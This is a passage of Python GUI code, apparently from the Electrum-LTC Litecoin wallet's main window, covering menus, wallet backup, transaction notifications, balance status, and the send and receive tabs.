self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend litecoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request litecoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Litecoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
try:
new_path = self.wallet.save_backup()
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
if new_path:
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
else:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
tools_menu.addAction(_("&Lightning Network"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network))
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum-ltc.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('litecoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-LTC",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Litecoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Litecoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum-LTC - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum-LTC", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum-LTC", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter="",
*, default_extension: str = None,
default_filter: str = None) -> Optional[str]:
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join(directory, filename)
file_dialog = QFileDialog(self, title, path, filter)
file_dialog.setAcceptMode(QFileDialog.AcceptSave)
if default_extension:
# note: on MacOS, the selected filter's first extension seems to have priority over this...
file_dialog.setDefaultSuffix(default_extension)
if default_filter:
assert default_filter in filter, f"default_filter={default_filter!r} does not appear in filter={filter!r}"
file_dialog.selectNameFilter(default_filter)
if file_dialog.exec() != QDialog.Accepted:
return None
selected_path = file_dialog.selectedFiles()[0]
if selected_path and directory != os.path.dirname(selected_path):
self.config.set_key('io_dir', os.path.dirname(selected_path), True)
return selected_path
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
# x is in sats
return self.config.format_amount(x, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
# amount is in sats
text = self.config.format_amount_and_units(amount)
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Litecoin addresses.'),
_('The Litecoin address never expires and will always be part of this Electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('New Address'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_invoice_button.setText(_('New Address'))
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Incoming payments'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
if is_lightning:
if not self.wallet.lnworker.channels:
self.show_error(_("You need to open a Lightning channel first."))
return
# TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Litecoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Litecoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Outgoing payments'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
